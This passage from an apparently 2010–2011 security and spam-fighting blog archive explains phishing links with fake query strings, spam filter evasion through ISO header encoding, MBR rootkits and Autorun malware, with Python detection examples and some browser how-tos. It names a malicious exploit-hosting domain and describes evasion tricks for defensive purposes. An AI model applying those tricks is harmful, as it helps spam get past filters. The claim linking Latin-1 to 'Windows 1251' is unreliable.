For the past week, I have been seeing and reporting (to SpamCop), scam email messages claiming to come from various financial agencies, or banks, with unusual links; all leading to malware servers. This is a continuation of the ACH, FDIC, etc., malware fraud that has been making the rounds for the past few months.

What's different about the links in these new scams is that they are HUGE! They all start out like any normal hyperlink, with a domain name and a particular file. But, appended to the end of the file name is a humongous "query string" (query strings begin with a question mark), containing multiple long groups of letters and numbers, separated by = signs. I have just analyzed one that has 214 alpha-numeric characters in the query string!

But, like octopus ink, things aren't always as they appear to be!

Being a Webmaster and web page writer, it didn't take me long to figure out that the file type that had the query string appended to it was not a valid active content file. Sure, it could possibly have been rigged to be such a file, like a php type, but these are not. They are Plain Jane simple html files, ending in the extension .htm. The .htm file type does not accept any query strings. If you append such a string of characters to it, the server will ignore them completely. All you see is the htm, or html file contents.

All of the rigged links I have traced are placed on compromised websites hosted on Apache web servers. The standard configuration of Apache web servers does NOT parse .htm, or .html files for active content. They are treated as "static" or flat files. No matter what the characters are that follow the file name and extension, the Apache servers where these links are pointing will ignore the phony query strings.

But, the .htm file type link in the scam emails is not where this story ends. The contents of each and every one I have analyzed contains a few simple lines of straight forward HTML code and an "iframe" (inline frame) - which imports a page hosted on a Russian website named csredret.ru (or variation thereof), containing a JavaScript array that leads to targeted attacks based on the brand of browser you are using and the installed plug-ins, especially unpatched versions of Java.

After seeing another such scam email link tonight, I decided to write a spam filter to detect this type of link. I named the filter: "Fake Query String In Link." The filter is for the anti-spam program MailWasher Pro.
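As an added example (not the author's MailWasher Pro filter, whose rule text is not reproduced here), the following Python function expresses the same detection idea: a link to a static .htm or .html file that carries a long query string made of alphanumeric groups joined by "=" signs, rather than the key=value&key=value pairs a real script would take. The sample message body, the host names and the query string are constructed for the example; the thresholds (60 characters, 3 groups) are assumptions chosen so that short cache-busters such as page.htm?v=3 are not flagged.

```python
import hashlib
import posixpath
import re
from urllib.parse import urlsplit

# Constructed sample: seven hex groups chopped up by '=' signs, mimicking the
# shape of the links described above (no real URL from the scam is used).
SAMPLE_QUERY = "=".join(
    hashlib.sha1(f"constructed-{i}".encode()).hexdigest()[:30] for i in range(7)
)

# Constructed message body: one scam-style link among ordinary ones.
SAMPLE_BODY = f"""Dear customer,
Your ACH transaction was rejected. Please review the report:
http://compromised-site.example/news/report.htm?{SAMPLE_QUERY}

Regards, Payments Team
http://www.example.com/contact.htm
https://www.example.com/search.php?q=ach+transfer&page=2
http://www.example.com/faq.html?v=3
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
STATIC_EXTENSIONS = (".htm", ".html")


def is_fake_query_link(url: str, min_length: int = 60, min_groups: int = 3) -> bool:
    """True when a link to a static .htm/.html file carries a long query string
    built from alphanumeric groups joined by '=' instead of key=value pairs.

    A stock Apache server serves the .htm file and ignores the query entirely,
    so the only purpose of such a string is to make the link look unique and
    legitimate.  The length threshold keeps short cache-busters (faq.html?v=3)
    out of the match.
    """
    parts = urlsplit(url)
    _, ext = posixpath.splitext(parts.path)
    if ext.lower() not in STATIC_EXTENSIONS:
        return False
    query = parts.query
    if len(query) < min_length or "&" in query:
        return False
    groups = [g for g in query.split("=") if g]
    return len(groups) >= min_groups and all(g.isalnum() for g in groups)


def flag_links(text: str) -> list:
    """Return every URL in the text that matches the fake-query-string pattern."""
    return [url for url in URL_RE.findall(text) if is_fake_query_link(url)]


if __name__ == "__main__":
    for url in flag_links(SAMPLE_BODY):
        print("suspicious link:", url)
```

The same rule can be written as a regular expression in any filter product that matches on link URLs; the Python form above just makes the three conditions (static file extension, unusual length, no key=value structure) explicit so they can be tuned independently.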

Continue reading "MailWasher spam filter for links to .htm files with huge query strings" »


September 1, 2011

Tutorial on how to copy and paste text

Just the other day, a friend of mine posted a funny YouTube recording he made of his Grandma calling him with a computer usage question. She wanted to have him tell her what it meant to "copy and paste" something. While some may find the conversation humorous, others new to computers, or those who have never had to copy and paste before and are now faced with having to perform this operation, may want to know what this means and how it is done. I shall endeavor to explain it to you.

What does the phrase "Copy and Paste" mean?

Simply put, it is a technique used by a person using a computer, or hand held digital device (tablet, smart phone, e-reader), to highlight and save a section (or an entire page) of text (see "What is Text") to an electronic storage location in the computer's memory, then insert that copied text into another place where text can be added, on that device, or onto one which is connected to it by a network.

To my knowledge, most, but not all electronic devices or applications that display text, and which allow the use of a key pad or mouse type pointer, usually have a means of allowing the viewer to copy sections, or all of the text displayed on a page, or document, then paste it elsewhere. Exceptions include documents that are specifically copy protected for legal, copyright, or licensing reasons. Furthermore, the device must have some form of electronic memory to save such copied text, until it is pasted, or the device is powered off.

Note: If you read an article and want to copy and paste sections, or all of it to a publicly viewable web location, first read the copyright notice that is usually at the bottom of every web page which contains any copyrighted material. There are stiff fines that can be levied against persons who copy and post someone else's copyrighted articles without express written permission. Copyright holders who are concerned about their rights are able to find and trace content thieves and file charges against them for violation of the DMCA.

Then, Grandma asked my friend: "What is text?"

"Text" is the (combination of) letters, numbers, punctuation marks and spaces that form the human or "text-to-voice" readable words, prices, addresses, distances, ages, and other descriptions that can be read on a page, whether printed or electronic. This assumes that one has had "book learnin'!" Text is not images, or YouTube movies, or banners ads, or logos, or audio files. Text is what is used to cipher readin', writin' and 'rithmetic!

Let's get on with the copying and pasting...

Continue reading "Tutorial on how to copy and paste text" »


July 8, 2011

How to display and use the statusbar in your email client

Prologue

Recently, I have published blog articles describing spam emails containing links to disreputable URLs. I have mentioned in these articles that one means of self defense against visiting obviously bad locations is to hover over a link and read the actual URL of that link - in your email client "Status bar." But, what if there is no Status bar showing in your email reader? How do you reveal it?

This brief technical article will show you how to reveal a hidden "Status Bar" in the most common email clients (in 2011). It also explains why having this bar visible is so important and gives a brief tutorial on making sense of the details that are displayed when one hovers over a link with their mouse pointer.

Displaying Email Client Status Bars

If you still have Windows XP (or, earlier; shudder the thought), you may have Microsoft's Outlook Express as your default POP3 email client. Others using XP, or Vista, have gotten the message about Outlook Express being deprecated (abandoned) by Microsoft and have moved up to Windows Live Mail (aka: WLM). People using Windows 7 are only offered Windows Live Mail 2011 (and newer, yet to come versions). All three versions have the means of turning the Status Bar on and off.

To show or hide the Status Bar in Outlook Express, Windows Mail (Vista only) and Windows Live Mail for XP and Vista, open the program, go to the menu bar item View, then click to place a check mark in Status Bar. It's that simple!

If you use Windows 7, your version of Windows Live Mail is probably version 2011 (or newer version, yet to come). Your interface is different than Outlook Express and the WLM for XP. To show the Status Bar, open the program, click on the "View" button in the row under the Title Bar, go to the right side and click the button labeled Status Bar. It appears (or disappears) instantly. Done!

If you are using Mozilla Thunderbird as your email client and for some reason the Status Bar is hidden, you can bring it back thusly: go to View > Toolbars > Status Bar and click to check it. The Status Bar will appear instantly.

Other email clients will have their own methods of turning the Status Bar on and off. I recommend leaving it on, all the time. Here's why...

Continue reading "How to display and use the statusbar in your email client" »


July 6, 2011

Spammers are using ISO encoding, in Subject and From, to evade spam filters

Most people who see an obvious spam email message, based on the "Subject" or "From" fields, just delete it on sight. I often go one step further and examine the normally hidden source code. This gives me an insight into some tricks employed by criminals to get their spam messages past the spam filters used by many ISPs and email providers. This helps me to develop new, or modify existing spam filters that I publish for MailWasher Pro users.

I have seen many changes in spam composition tactics over the years I have spent fighting spammers. One trick that used to be prevalent a few years ago is making a big comeback right now. That is the use of "ISO Encoding" for the Subject, From and sometimes other fields in the normally hidden email headers. This type of encoding has legitimate uses and senders (like Yahoo), so don't rush to premature conclusions and block everything containing an ISO subject.

What is ISO encoding and why do spammers employ it as an evasion tactic?

ISO is the International Organization for Standardization, the world-wide body that establishes common standards for all manner of interoperable systems that are used around the World, to allow them to interact with one another. This includes the standards of email systems and the coding used in email messages. One of the email standards established and defined by ISO is the email header "Codepage" encoding system. This system is used to tell an email client (program/reader) what language the message is written in and how to render the contents when it is opened.

The default Codepage system used in English language email messages is known as ISO-8859-1. It corresponds to the "Latin-1" and "Windows 1251" character sets. If an email is composed without any declaration of Codepage, and is sent through mail servers assigned to Western languages, it is automatically displayed in English, using the default display of the user's computer.

Since email composed in one language locality is frequently sent to recipients with a different language and alphabet, senders can specify that they are asking those messages to be displayed in the language and alphabet of the recipients. This is where the use of ISO encoding in the email headers comes into play. It is used frequently by International companies in email blasts to numerous recipients around the Globe.

Spam email also benefits from ISO encoding. Here's how:

Many free email systems, like Microsoft's Hotmail, are plagued with "bots" used by spammers to break security challenges (e.g. CAPTCHA), open new free mail accounts using bogus information, then send out spam blasts to the recipients listed in spam databases. The spammers may get only one or two successful spam runs before they trigger alarms at the email provider and the account gets shut down. But, to ensure that the spam actually gets out at all, they have to make sure it isn't blocked by the outgoing email server's spam detection filters. In English speaking countries, the default spam filters are written in English and match English language words and phrases.

Spammers using these free email providers have learned that one of the easiest ways to avoid having spam messages blocked by outgoing filters is to not use English words and phrases in the From, Reply, or Subject fields. Instead, they are resorting to the use of ISO encoding tricks. The outgoing spam filters look at the hidden headers as well as a snippet of body text, looking for significant matches. Many incoming mail servers also use the same spam detection systems. By using ISO encoding in the From and Subject, one can sneak spam words past many common spam filters.

Once these messages arrive in recipients' inboxes, their email program ("client"), or web-mail browser, translates the ISO codes into the language specified in the Codepage declaration. In the case of ISO-8859-1, the displayed words will be in standard American English. The recipient does not see any of the coding tricks, just the decoded letters and words. The message slipped past anti-spam filters at the sending end and at the receiving email server, both of which look at the headers first and then so many lines of the body text.

Most of the ISO spam messages also use ISO or other encoding tricks, gibberish (salad words) and non-displaying text hidden inside html style tags, in the beginning of the body, moving the actual spam words and links way down, past where most commercial spam filters give up.
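As an added example (not code from the original article), the Python snippet below shows why a filter must decode the Subject and From before matching words. The "ISO encoding" described above is the encoded-word syntax of RFC 2047 (`=?charset?B?...?=` or `=?charset?Q?...?=`), which the standard library's `email` package decodes. The sample message, the addresses, the keyword list and the accent-folding step are all constructed for this example; the message is not real spam.

```python
import unicodedata
from email import policy
from email.parser import BytesParser

# Constructed sample message (not a real spam): both the From display name
# and the Subject are ISO-8859-1 B-encoded words, so no English word is
# visible in the raw header bytes.
SAMPLE_MESSAGE = b"""From: =?ISO-8859-1?B?TG90dOlyeSBXaW5uZXI=?= <promo@example.invalid>
To: you@example.invalid
Subject: =?ISO-8859-1?B?Q2hlYXAgcGlsbHMgb25saW5l?=
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-1"

Congratulations, see the attached notice.
"""

# Stand-in for a real filter's word list (constructed for the example).
SPAM_TERMS = ("cheap pills", "lottery", "winner")


def raw_headers(raw: bytes) -> dict:
    """From and Subject exactly as they sit on the wire.

    The compat32 policy leaves encoded-words untouched, which is what a
    filter matching on raw header text effectively sees.
    """
    msg = BytesParser(policy=policy.compat32).parsebytes(raw)
    return {"From": msg["From"], "Subject": msg["Subject"]}


def decoded_headers(raw: bytes) -> dict:
    """From and Subject after encoded-word decoding.

    The default policy decodes RFC 2047 encoded-words to text, which is
    what the recipient's mail client displays.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return {"From": str(msg["From"]), "Subject": str(msg["Subject"])}


def fold_accents(text: str) -> str:
    """Reduce accented letters to their base letter (Lottéry -> Lottery),
    so lookalike spellings cannot dodge an ASCII word list."""
    decomposed = unicodedata.normalize("NFKD", text)
    return decomposed.encode("ascii", "ignore").decode("ascii")


def matched_terms(headers: dict) -> list:
    """Case- and accent-insensitive keyword hits over the header values."""
    haystack = fold_accents(" ".join(headers.values())).lower()
    return [term for term in SPAM_TERMS if term in haystack]


if __name__ == "__main__":
    print("raw headers:    ", raw_headers(SAMPLE_MESSAGE))
    print("raw matches:    ", matched_terms(raw_headers(SAMPLE_MESSAGE)))
    print("decoded headers:", decoded_headers(SAMPLE_MESSAGE))
    print("decoded matches:", matched_terms(decoded_headers(SAMPLE_MESSAGE)))
```

Run against the raw headers the word list matches nothing; run against the decoded headers it matches all three terms. The accent folding is there because the same trick works with legitimate Latin-1 characters: a display name of "Lottéry Winner" survives a literal search for "lottery" unless the é is reduced to e first.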

If you want to learn more about the use of ISO encoding, as it pertains to spam filters and email, read my extended content.

Continue reading "Spammers are using ISO encoding, in Subject and From, to evade spam filters" »


June 28, 2011

New variant MBR rootkit removal requires Windows or repair disk

On June 22, 2011, a Microsoft researcher published disturbing findings about a new variant of a rootkit named "Popureb" - by Microsoft's Malware Protection Center. This variant, dubbed Popureb.E, is a Master Boot Record (MBR) infector, as were its predecessors. But, this variant is different from the others in that it has a unique defense against being removed by the usual methods.

Rootkits are bad news for those whose computers are infected with them. They hide deep inside the operating system and act as puppeteers for other badware files. Rootkits can act as downloaders of malware and upgrades to it, as spam engines, and as protectors of the malware programs they have installed. They can even act as a strange kind of anti-virus, by uninstalling rival malware files.

"Kernel mode" rootkits can usually be removed by using advanced anti-virus program modules that stop the rootkit process in memory, enumerating its normally hidden files and start-up Registry entries, then deleting them during a reboot cycle.

Boot sector, or MBR rootkits are a horse of another color! Boot sector rootkits are the worst of the worst. They hide in the first sector (0) of your boot hard drive and are loaded along with the hardware devices, as the computer boots up, before the OS is active. By loading at the beginning of the boot-up cycle, MBR rootkits, also known as "Bootkits," are able to evade detection by normal anti-virus programs. Even if detected, removal often requires rewriting the MBR, which overwrites the bootkit code with legitimate start-up code.

The most common way to remove standard MBR rootkits and other sector 0 infectors, is to use any preinstalled recovery console, or repair options that exist on that PC. Windows XP and 2000 had an installable Recovery Console, which was added to the boot options menu. Windows Vista and Windows 7 install repair options that become accessible when you restart and tap the F8 key repeatedly. This option is called Repair Your Computer.

So, let's say you have an XP, Vista or W7 computer that acquires a boot sector infector and you have either the Recovery Console, or Repair Your Computer option available during the initial boot cycle. If you go into one of those options from the boot menu or F8 boot options, and choose to "repair your startup files" (Vista/7), or use the Recovery Console, to rewrite the MBR (FIXMBR), will it kill the newest bootkits? Not if it is the one dubbed "Popureb.E."

Continue reading "New variant MBR rootkit removal requires Windows or repair disk" »


June 15, 2011

Windows malware infections from Autorun exploits down by 82% from 2010

According to a Microsoft Technet Blog article published on June 14, 2011, malware infections resulting from exploits involving Autorun (like when you plug in a USB memory device and it runs a program or setup automatically) have dropped by 82% from the numbers recorded during the same period in 2010.

The percentage of decline varied with the operating system and service pack installed. Windows XP users who have Service Pack 3 installed saw a 62% drop in Autorun installed malware, after accepting the optional patch issued on Feb 8, 2011, or the forced installation of the reissued patch, pushed out on February 24, 2011.

If you are operating a Windows XP computer with any service pack older than SP3, your version of Windows is now out of support and you are no longer receiving any critical patches. Thus, your computer is not protected against this, or any other recently patched vulnerabilities. If it is connected to the Internet, or if you plug in an infected USB device, unless you have manually edited your computer's Registry to disable Autorun, or it is running industrial strength anti-malware protection, it will eventually become infected and probably botted.

Computers running on Windows Vista with SP1 saw a 68% decline, while those with SP2 installed had a whopping 82% drop in malware installations.

Note! Microsoft will stop supporting Windows Vista Service Pack 1 on July 12, 2011. From that date onward, Microsoft will no longer provide support or free security updates for Windows Vista Service Pack 1 (SP1). You folks need to upgrade to Vista SP 2 by July 12, 2011, or you will not receive any more updates or patches.

Why have Autorun infection rates dropped so dramatically?

The drop in malware infections from Autorun exploits is attributable to patch KB971029, which Microsoft released as an optional update with the Windows Updates of February 8, 2011, and two weeks later as a non-optional update. It turned OFF Autorun for "non-shiny" media, that is, anything other than CDs and DVDs. Before then, if you plugged a USB stick (a.k.a. thumbdrive, flash drive) into your Windows XP or Vista computer and there was a setup file on that memory device, it would run automatically. With the update installed, flash drives inserted into a PC running XP (SP3), or Vista no longer offer the option to run programs. However, the demise of AutoRun does not affect CDs or DVDs (just USB devices or shared network drives).

Some notorious infections went so far as spoofing the wording of options on the dialog box that usually opens when you plug in a USB device. The wording was crafted to induce unwary users into choosing the spoofed option, which was reworded so that it appeared to open the drive as a folder for them to look at. In fact, that option was still there, as the next option down! The first one executed a hidden file on the device, named "autorun.inf" - which triggered a hidden executable file on the drive, which was a malware/spyware setup file. Because of its being the first choice and the craftiness of the wording, many thousands of intelligent people were fooled into clicking it and installing the malware contained on those devices.

It was infected thumb drives that allowed the Conficker worm to spread so widely and quickly in late 2009 and early 2010.

Continue reading "Windows malware infections from Autorun exploits down by 82% from 2010" »


November 23, 2010

PCmover Transfers Your Files, Settings and Programs To A New PC

With the Black Friday Christmas 2010 season about to kick off, many people will be getting brand new Windows 7 computers, to replace their old XP and Vista computers. If you are getting a new computer to replace your old one, but want to keep your installed programs and settings, LapLink's PCMover is the easiest way to accomplish this task.

PCMover is a software program that you install on both the old and new computers. The computers must be connected by some means, either by a network connection, or LapLink crossover cable. Your files, settings and program installations will be transferred over that connection, from the old, to the new PC.

PCmover is the ONLY software that moves programs, files and settings from your old PC to your new PC - even restore from an image (or old hard drive) or perform an in-place upgrade.

The easy-to-use wizard will guide you in selecting which programs, files and settings you want on your new PC. When complete, your new computer will have the personality and functionality of your old one. And PCmover is safe: it removes nothing from your old PC, won't overwrite anything on your new PC, and includes an easy "Undo" feature.

I have written an entire web page describing PCMover, along with links to buy it (and a LapLink cable if needed). PCMover is licensed per move: you pay for each transfer you want to perform. Additional licenses are available at discounted prices for people with several computers to replace.

PCMover Home, selling for $39.95, moves all of your programs (no selections) at once, plus all of the files and settings of the logged-in user performing the move. In contrast, PCmover Professional™ automatically moves all the programs, licenses, files and settings that you select, along with all user profiles and settings, from your old PC to your new one, and all of your applications will be installed automatically, ready to use. It even moves user accounts joined to network domains.

Black Friday through Cyber Monday Super Discount Announcement

If you read this article between November 25 and November 29, 2010, you can save a whopping 50% off the regular price of PCMover Professional™. The normal price for the Professional version is $59.95, but it is on sale through my links for only $29.95. This makes the Professional version $10 cheaper than the more limited Home version! This sale price runs from 12:01 AM Nov 25 through 11:59 PM Nov 29, Pacific Time. I hope you don't miss out on this deal!


October 15, 2010

JavaScript workaround to clear Facebook Chat history

Update: As of the late evening of October 15, 2010, Facebook listened to our petition and has restored the link to Clear Chat History! Chalk another one up for the Good Guys! The link is in the top right of your Facebook Chat boxes. It only works on your end. If you want your chat partners to clear their side, ask them to do so. Otherwise, your comments remain online.

Updated with more details on October 15, 2010, at 10:45 AM EST.

At the time I am writing this, Facebook has no means of clearing your Facebook Chat history. It is preserved for an undisclosed period, so every time you close the browser, open it again, log in to Facebook and open a Chat with a Friend, your previous chat history is still present. This is a serious security and privacy risk. If somebody else uses your computer, opens the same browser and goes to Facebook (which keeps you logged in if you chose to stay logged in), they can open the Chat box and click on the names of your Friends. Each Friend with whom you have recently chatted will reveal the entire chat history, until the Facebook servers finally delete it.

If the person reading your Facebook page is your employer, or a spy, or a jealous companion, they can read every word exchanged between you and your Chat partners. If you allow third party Facebook applications to access your profile, they can also access your chat history!

There is an ongoing petition, based on Facebook members "Liking" the topic, to get Facebook to restore the previously present, now removed link to delete individual chat histories. I have posted several comments about this matter. Now there is a workaround being discussed, involving a snippet of JavaScript that you copy and paste into the browser's address bar while viewing a Chat partner's profile. It is confusing to the less technically savvy Facebook users. I shall try to 'splain it in plain English.

Here is part of what a Facebook member posted. It works for me and some others, but confuses the hell out of too many members.

have the chat box of the person you're chatting with open or minimized. go to their profile.
{snip}
copy and paste the line below and replace their id in the address bar with the number after id= and hit the enter key. {snip}

javascript:chatDisplay.tabs[id].clearHistory();

I just tested that (full) procedure and it worked as advertised, but it took extra steps that were not described in detail. Here are the actual steps I took, in outline form:


  1. With the Chat box open and the Chat history present, right-click on that person's small photo inside the Chat box;

  2. From the context menu that appears, choose "Open in new tab" or else "Open in new window", depending on whether your browser lets you open links in new tabs.

  3. Look at the address bar of the new browser tab or window where the link from the profile picture opened. The address bar, or location bar as Firefox calls it, is where the URL of a web page is shown, e.g. http://whatever.com. On the right half of the Facebook URL there is "/profile.php?id=" (without the quotes), followed by either their Facebook user name or a long series of numbers;

  4. Click just after the = symbol, hold down the left mouse button, drag to the right across all of the member's name or numbers, then let go of the button;

    Example: If the address bar shows /profile.php?id=123456789012345, highlight just the group of numbers after the = sign. If the ID is the member's actual name rather than a number, copy that instead.

  5. Press CTRL and C together on your keyboard, to copy the now highlighted user id name or number

  6. Open Notepad, or another text editor.

    Windows method: Right-click your mouse or pointer anywhere in a blank area of your desktop display and hover the pointer over New, then move sideways to the little down arrow that appears and go down the list of options until you highlight Text Document. With your left mouse button, click to select Text Document. This will open a blank instance of Windows Notepad.

    Now, paste in the copied name or numbers by pressing the CTRL and V keys together.

  7. Hit the Enter key to create a new line in the new Notepad document window

  8. Highlight, Copy (Ctrl and C) and Paste (Ctrl and V) this code into a new line in the Notepad document:

    javascript:chatDisplay.tabs[id].clearHistory();

  9. Highlight and delete the letters id inside the square brackets, but not the brackets themselves.

  10. Highlight and re-copy the ID name or numbers you copied and pasted into Notepad, in step six (from the member's Facebook ID)

  11. Paste those numbers inside the square brackets where the word "id" was before you deleted it. Here's how it would look in my example id:
    javascript:chatDisplay.tabs[123456789012345].clearHistory();

  12. Now, copy and paste that code, but with the member's actual name or ID number in the brackets, into the address bar where that member's profile page was opened, in step #2, overwriting the existing facebook.com URL. You must replace the URL that was in the address bar with this code. Do not just add it in.

  13. With that JavaScript code in the address or location bar, press the ENTER key. If the Chat box is open on the other person's profile page, you will see the entire chat history disappear in front of your eyes!


A word of caution: pasting a javascript: line into the address bar is exactly the trick scammers use to get people to run hostile code inside their own logged-in Facebook session, so only paste a snippet whose every part you understand, and never one sent to you by a stranger. Instructions for newbies, for copying and pasting, are in my extended comments, below.

Continue reading "JavaScript workaround to clear Facebook Chat history" »


August 22, 2010

Where to save my updated MailWasher Pro spam filters

In early July, 2010, Firetrust, the makers of the famous anti-spam program: MailWasher Pro, released a brand new version. The new MailWasher 2010 was several years in the making and touts a new user interface, new spam weighting system and a brand new spam filter format.

Previously, MailWasher spam filters were in a plain text file, aptly named "filters.txt" - with each filter on a long separate line, ending with a line feed, but no blank lines between them. Some filters have many individual rules and trying to read and debug them is a challenge. The new version uses a well formed XML format, with indented sections and rules. This is a visually pleasing layout that is easy to read and edit, rule by rule. However, because each rule and condition is on a separate line, the file size is much larger than the old flat text file filters.

As many of you know, I write and publish spam filters for use in MailWasher Pro. I have been writing and updating these filters for years. But with the release of the new MailWasher 2010, a lot of work was needed to convert the old filter format into the new one. The good news is that as of today, August 22, 2010, I have completed the conversion and placed the new "Filters.xml" online. You can view and download it from my Custom Filters page.

If you already know where to save downloaded filters you don't need this article. Otherwise, you need this information to learn where to save updated filters. Where you save your filters file depends on both your operating system and the version of MailWasher Pro you have installed. Some, like me, use both the old and new versions simultaneously. I continue using the previous version 6.5.4, because it contains direct reporting of spam to SpamCop, for reporting members. And, the previous version has full-featured Mail Statistics and Spam Categories charts. I use the statistics and percentages reports in my weekly spam analysis articles, published on this blog, every Sunday (see my Spam and Email categories). These features are going to be added to the new version 2010 of MailWasher, at which time I and others will stop using the previous version.

If you are here out of curiosity, you can learn more about MailWasher Pro, or try it, or buy it here.

Let's move on with the locations of your spam filters, for various operating systems and versions of MailWasher Pro...

Continue reading "Where to save my updated MailWasher Pro spam filters" »


June 30, 2010

How to fix: The Adobe Flash plugin has crashed, in Firefox 3.6.4+

Starting with Firefox 3.6.4, Mozilla added a new feature called Crash Protection. It runs three plug-ins (initially Flash, Silverlight and QuickTime) in a separate process, so that if one of them crashes only the plug-in's content is lost, not the page or the browser. Since the browser itself survives the crash, it is possible to reload that tab and, hopefully, load the affected plug-in correctly.

However, soon after Firefox 3.6.4 was released, numerous complaints began arriving at Bugzilla claiming that the new crash protection made it impossible for those affected to play "Farmville." The timeout for deciding that a plug-in had hung was too short (10 seconds), and Farmville was taking longer than that to load its Flash content. The page would halt loading with this message: "The Adobe Flash plugin has crashed."

To rectify the problem Mozilla rushed out Firefox 3.6.6, with a longer timeout of 45 seconds. That should fix the problem for high-speed broadband customers, but those on slow connections (mobile broadband modems, smartphones, netbooks, less than stellar satellite Internet and dial-up) will still be affected. So, here is a manual workaround that lets you specify a new timeout value, or even disable hang protection completely.


How to disable or increase plug-in hang protection in Firefox 3.6.4+

You can disable hang protection so that Firefox never kills a hanging plug-in process, regardless of how long it is taking. Crashes in the plug-in will still be caught and will not terminate the browser process. The trade-off is that a plug-in which really is wedged will then hang the page indefinitely, until you end the plugin-container process yourself.

  1. In the Location bar, type about:config and press Enter (Return on a Mac).
    * The about:config "This might void your warranty!" warning page may appear. Click I'll be careful, I promise!, to continue to the about:config page.
  2. The about:config page should appear. In the Filter box, type, or copy and paste: dom.ipc.plugins.timeoutSecs
  3. Double-click the setting and change the number to -1 to disable hang protection.
  4. To keep hang protection but give slow plug-ins more time, change the value to a higher timeout, in seconds.
    * Example: 45 means Firefox waits 45 seconds before declaring that a plug-in has hung and halting the loading of the page.

You can apply this technique anytime an important web page is hanging because a plug-in is taking too long to load and Firefox declares that it crashed. You can undo your changes by lowering the timeout for normal crash protection.


June 7, 2010

Blocking Russian language spam with junk filter rules

I don't know if a Botnet has been mis-programmed, or if some Russian spammers have mistaken my domain for a Russian speaking domain, but I am seeing huge amounts of unreadable Russian language spam over the past month. However, I doubt that I am the only totally English speaking person in the USA who is getting this unintelligible Cyrillic spam.

The why's are unimportant to me, or to you, if you are also getting foreign language spam. A few years ago I was getting Chinese language spam, which is totally weird to look at. Both the Russian and Chinese alphabets look like something out of Star Trek to me. Most people are annoyed when they get any spam at all. But, getting spam you can't even read is worse. Since I can't read the content I have no use in looking at this crap, so I have created spam filters to automatically delete it off my email servers, and I will share them with you.

I have certain systems in place to filter out spam before I download it, but you all might have altogether different measures in place. I will outline my countermeasures, then suggest others that you may be able to use.

My primary tool in the war to secure my inbox is an anti-spam program called MailWasher Pro (MWP). It is a desktop application that intercepts all incoming POP3 email, from all of the various email servers that I use to get and send email. In my extended comments I will reveal two powerful filters that I have created, which combined will automatically delete 100% of the Cyrillic coded spam sent to my various POP3 accounts.

My second tool is my desktop email client, Windows Live Mail (WLM). This is the latest descendant of the no longer supported Outlook Express email client from Microsoft. Outlook Express died when Windows Vista was released; Windows Mail was included with Vista instead. With Windows 7, Windows Live Mail is the only email client available from Microsoft, as an optional download. Unlike Outlook Express, Windows Live Mail includes a junk filter module that receives updates from time to time. You can also keep messages out of your inbox with the "International" filter, which looks at the sender's From address and the message's language encoding. If the domain in the From field, or the text encoding, matches one on your blocked countries or encodings list, the message goes automatically to the Junk Mail folder, or is deleted, according to your choices.

The previous anti spam countermeasures are for people using a POP3 or IMAP desktop email client to download, read, compose and send email. But, many people are still using browser based email systems, like Hotmail, Yahoo, AOL, Comcast, Charter, and other proprietary mail systems from free mail providers, or from their web hosting companies. You folks must search out and apply any junk mail rules available from your email service. I will show you how to apply junk filters to Yahoo and Hotmail, using your web browsers.

Most web hosting accounts now come with the option to enable SpamAssassin. You can turn SpamAssassin on and add a rule that blocks any "From" address in the .ru domain, either with SpamAssassin's own blacklist_from directive or with a header rule whose regular expression matches .ru at the end of the sender's domain. Blocking a whole country-code domain is a blunt instrument, so make sure you have no legitimate .ru correspondents first.
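To make the two kinds of rule concrete, here is an added Python example (written for this page; it is not a MailWasher or SpamAssassin filter and not the author's own filter set) that applies them to raw messages: the .ru sender rule from the paragraph above, plus the checks a Cyrillic filter needs, namely a Cyrillic charset declared in the headers, Cyrillic letters in the decoded Subject, or a body that is mostly Cyrillic. The three messages are constructed for the example; the encoded Subject and body both decode to the Russian word for "hello".

```python
"""Classify raw e-mail as Cyrillic/Russian spam. Added example, not the
original post's MailWasher filters; the sample messages are constructed."""
import email
import re
from email import policy

CYRILLIC = re.compile(r"[\u0400-\u04FF]")
CYRILLIC_CHARSETS = {"koi8-r", "koi8-u", "windows-1251", "cp1251", "iso-8859-5"}
RU_SENDER = re.compile(r"@[\w.-]+\.ru\b")     # the .ru From rule from the post


def cyrillic_ratio(text):
    """Share of alphabetic characters that are Cyrillic (0.0 when no letters)."""
    letters = [c for c in text if c.isalpha()]
    if not letters:
        return 0.0
    return sum(1 for c in letters if CYRILLIC.match(c)) / len(letters)


def declared_charsets(msg):
    """Charsets declared on the message or on any MIME part, lowercased."""
    found = set()
    for part in msg.walk():
        cs = part.get_content_charset()
        if cs:
            found.add(cs.lower())
    return found


def body_text(msg):
    """Decoded text of the first plain/HTML part, '' if absent or undecodable."""
    part = msg.get_body(preferencelist=("plain", "html"))
    if part is None:
        return ""
    try:
        return part.get_content()
    except (LookupError, UnicodeDecodeError):
        return ""


def classify(raw):
    """Return (is_spam, reasons) for one raw RFC 5322 message given as a str."""
    msg = email.message_from_string(raw, policy=policy.default)
    reasons = []
    if RU_SENDER.search(str(msg.get("From", "")).lower()):
        reasons.append("sender domain .ru")
    if declared_charsets(msg) & CYRILLIC_CHARSETS:
        reasons.append("Cyrillic charset declared")
    if CYRILLIC.search(str(msg.get("Subject", ""))):   # policy.default decodes =?..?= words
        reasons.append("Cyrillic in Subject")
    if cyrillic_ratio(body_text(msg)) > 0.5:
        reasons.append("body mostly Cyrillic")
    return bool(reasons), reasons


# Constructed samples. Subject is UTF-8 base64, body is KOI8-R base64; both
# decode to the same six-letter Russian word.
SPAM = """From: Promo <promo@example.ru>
To: me@example.com
Subject: =?utf-8?B?0J/RgNC40LLQtdGC?=
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: base64

8NLJ18XU
"""
EN_FROM_RU = """From: Someone <sales@example.ru>
To: me@example.com
Subject: Our offer

Plain English text from a .ru address.
"""
HAM = """From: Friend <friend@example.com>
To: me@example.com
Subject: Lunch tomorrow?

Noon at the usual place.
"""

if __name__ == "__main__":
    for name, raw in (("SPAM", SPAM), ("EN_FROM_RU", EN_FROM_RU), ("HAM", HAM)):
        print(name, classify(raw))
```

Each reason on its own is a separate rule, which is how MailWasher-style filters are written; a message only needs to trip one of them to be flagged, and the charset and Subject checks catch Cyrillic spam sent from non-.ru addresses.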

Continue reading "Blocking Russian language spam with junk filter rules" »


April 24, 2010

The Foxit PDF reader is becoming an Adware supported P.U.P.

